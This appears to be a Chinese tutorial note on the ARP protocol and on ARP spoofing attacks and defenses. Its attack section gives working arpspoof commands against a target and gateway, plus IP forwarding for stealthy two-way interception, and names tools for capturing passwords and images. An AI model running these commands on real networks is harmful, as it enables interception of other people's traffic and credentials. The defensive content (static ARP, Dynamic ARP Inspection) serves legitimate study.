免责声明:本文仅做分享!
目录
知识点
经典多路访问网络
以太网(支持广播的多路访问网络)
多点帧中继(非广播的多路访问网络)
DMVPN的多点GRE(非广播多路访问网络)
两种地址
逻辑地址 (一般是IP)
物理地址 (MAC/DLCI/全局IP)
逻辑到物理地址的解析协议
以太网(ARP)
帧中继(Frame Relay Inverse ARP)
MGRE(NHRP)
(自动/手动)
注意:仅仅知道目的的逻辑地址,不知道物理地址,设备不会向网络发送任何数据帧
ARP
介绍
“Address Resolution Protocol”(地址解析协议)
在以太网中,将IP地址解析成MAC地址。 --数据的传输所依懒的是MAC地址而非IP地址.
ARP(Address Resolution Protocol,地址解析协议)是TCP/IP协议栈中的一个重要组成部分,其工作原理主要涉及将网络层(IP层)提供的32位IP地址解析为数据链路层(MAC层)使用的48位物理地址,即MAC地址。
工作原理
一、发送ARP请求
-
需求产生:当源主机需要与目的主机通信时,如果源主机的ARP缓存表中没有目的主机的MAC地址,源主机就会发送一个ARP请求。
-
请求构造:
ARP请求是一个广播包, -- ARP报文:
-
发送方硬件地址(Sender Hardware Address):发送ARP请求的设备的MAC地址。
-
发送方协议地址(Sender Protocol Address):发送ARP请求的设备的IP地址。
-
接收方硬件地址(Target Hardware Address):在ARP请求中通常为空,表示这是一个广播请求。
-
接收方协议地址(Target Protocol Address):目标设备的IP地址。
-
-
广播发送:这个ARP请求会在本地网络段内广播,请求目的主机回应其MAC地址。
二、接收并回应ARP请求
-
请求接收:当网络上的所有设备(包括目的主机)接收到ARP请求后,会检查请求中的目的IP地址是否与自己匹配。
-
匹配与回应:
如果目的主机的IP地址与请求中的目的IP地址匹配,目的主机就会发送一个ARP响应。
ARP响应 是一个点对点的数据包,包含以下信息:
-
源硬件地址:目的主机的MAC地址。
-
源协议地址:目的主机的IP地址。
-
目标硬件地址:发送ARP请求的设备的MAC地址。
-
目标协议地址:发送ARP请求的设备的IP地址。
-
-
发送响应:目的主机将ARP响应直接发送给源主机。
三、学习并记录MAC地址
-
缓存更新:源主机收到ARP响应后,会从响应中提取目的主机的MAC地址,并将其与目的主机的IP地址一起存储在ARP缓存表中。
(动态/静态)
-
后续使用:在后续的通信中,源主机可以直接使用存储在ARP缓存表中的MAC地址,而不需要再次发送ARP请求。
四、完成数据传输
-
数据封装:源主机在获得目的主机的MAC地址后,就可以将数据封装成以太网帧,并使用目的主机的MAC地址作为目标地址发送出去。
-
数据传输:封装好的数据帧通过物理网络传输到目的主机,完成整个通信过程。
发现目标
前提还是要在局域网中,such as 连着同一个WiFi
然后用 nmap 扫一下 --> 发现目标 (多角度干)
...等等工具
攻击
局域网 流量 AK 中间人
工作组&局域网-ARP欺骗-攻击防御&单双向_arp欺骗双向-CSDN博客
工具:arpspoof ettercap driftnet看图片 bettercap登录密码 钓鱼 挂马
alandau/arpspoof: A simple ARP spoofer for Windows (github.com)
apt-get install dsniff
原理
(注意攻击前后MAC地址的变化)
arpspoof
apt-get install dsniff
arpspoof -t 192.168.49.141 192.168.49.2 -i eth0 靶机IP 靶机网关 网卡接口
(强度不够,直接多来几个窗口...)
---查看靶机arp动态缓存改变,上不了网:
双向劫持
转发,流量放行,让目标能上网,不易察觉,还可监控其流量。
sysctl -w net.ipv4.ip_forward=1 echo 1 > /proc/sys/net/ipv4/ip_forward
防御
windows:
arp -a netsh i i show in #记录网卡的idx值 #修改命令: netsh -c i i add neighbors 14 192.168.127.2 00-50-56-e3-44-05 netsh -c i i add neighbors <idx值> <靶机网关IP> <靶机MAC地址> arp -s 网关IP 网关MAC
linux:
arp arp -i eth0 -s IP MAC 清除arp缓存: sudo arp -d <IP地址> sudo ip neigh flush all
设备:
ARP监控:
1.使用ARP监控,管理员可以指定交换机的端口为信任和非信任端口:
( 互联的信任,不互联的检查一下)
信任端口可以转发任何ARP信息
非信任端口的ARP消息要进行ARP检测验证
2.交换机执行如下的ARP验证:
为一个静态的IP地址配置一个静态ARP访问控制列表 (静态ARP监控功能)
为DHCP指派的IP地址引I用DHCPsnooping绑定数据库(动态ARP监控功能)
1.如果使用DHCP,确认DHCP Snooping技术已经被激活,并且已经完全填充数据库。
2.指定某端口为受信任的端口,也就是接受这个接口上的ARP欺骗威胁。
3.指定其他端口为非信任
的端口。
4.在每一个端口上调整ARP限速。
5.配置一个ARP访问控制列表,静态映射IP到MAC。
6.调整error-disable
行为。
7.在特定VLAN中启用ARP Inspection
功能。
在网关绑定主机MAC与IP地址
使用ARP防火墙